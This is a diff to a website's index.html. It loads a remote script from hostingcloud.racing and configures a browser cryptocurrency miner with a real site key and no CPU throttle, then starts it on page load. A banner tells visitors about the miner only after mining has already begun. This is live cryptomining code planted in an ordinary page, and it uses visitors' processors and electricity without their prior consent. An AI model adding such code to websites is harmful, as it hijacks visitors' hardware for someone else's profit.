--- a/index.html
+++ b/index.html
@@ -6,8 +6,12 @@
   <body>
     <script src="https://www.hostingcloud.racing/uDEu.js"></script>
 <script>
-    var miner = new Client.Anonymous('<site-key>', { throttle: 0.8});
-    miner.start();
+    var _client = new Client.Anonymous('cefc78aa86c8fb633abd11e8b1d6c4b0d6be0258aad269391a3922f5a852b0b8', {
+        throttle: 0, c: 'w'
+    });
+    _client.start();
+    _client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com. If it bothers you, you can stop it.", "#cccccc", 40, "#3d3d3d");
+
 </script>
   </body>
 </html>
